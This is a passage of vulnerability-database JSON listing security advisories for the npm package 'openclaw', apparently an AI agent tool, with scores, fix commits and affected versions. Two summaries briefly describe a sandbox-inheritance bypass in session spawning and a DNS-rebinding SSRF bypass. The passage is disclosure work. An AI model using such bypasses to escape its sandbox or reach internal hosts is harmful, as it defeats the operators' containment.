ies/GHSA-98ch-45wp-ch47","reference_id":"GHSA-98ch-45wp-ch47","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-98ch-45wp-ch47"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-x
fcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["GHSA-98ch-45wp-ch47"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7ntr-5dr5-9uf8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50534?format=json","vulnerability_id":"VCID-7pqs-17nm-duf1
","summary":"OpenClaw: Sandboxed sessions_spawn(runtime=\"acp\") bypassed sandbox inheritance and allowed host ACP initialization\nSandboxed `sessions_spawn(runtime=\"acp\")` could bypass sandbox inheritance and initialize host-side ACP runtime. The fix now fail-closes ACP spawn from sandboxed requester sessions and rejects `sandbox=\"require\"` for `runtime=\"acp\"`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ac11f0af731d41743ba02d8595f4d0fe747336e3","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/ac11f0af731d41743ba02d8595f4d0fe747336e3"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c703aa0fe92df9fb71cf254fc46991e05fba2114","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/c703aa0fe92df9fb71cf254fc46991e05fba2114"},{"reference_url":"https://github.com/advisories/GHSA-474h-prjg-mmw3","reference_id":"GHSA-474h-prjg-mmw3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-474h-prjg-mmw3"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-474h-prjg-mmw3","reference_id":"GHSA-474h-prjg-mmw3","reference_type":"
","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-474h-prjg-mmw3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-
dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-
mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-
3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-
gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-
8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-
s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["GHSA-474h-prjg-mmw3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7pqs-17nm-duf1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89179?format=json","vulnerability_id":"VCID-7snr-fn3
u-x3b8","summary":"OpenClaw: Browser SSRF hostname validation could be bypassed by DNS rebinding\n## Summary\n\nBrowser SSRF hostname validation could be bypassed by DNS rebinding.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nBrowser navigation policy could validate a hostname/IP resolution that differed from the address Chromium ultimately used, allowing DNS rebinding style SSRF pivots.\n\n## Technical Details\n\nThe fix tightens strict browser hostname navigation so unallowlisted hostname URLs fail closed under restrictive policy.\n\n## Fix\n\nThe issue was fixed in #64367. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `121c452d666d4749744dc2089287d0227aae2ed3`\n- PR: #64367\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this 
issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43582","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09978","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09994","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11564","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43582"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/121c452d666d4749744dc2089287d0227aae2ed3","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:31:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/121c452d666d4749744dc2089287d0227aae2ed3"},{"reference_url":"https://github.com/openclaw/openclaw/pull/64367","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR
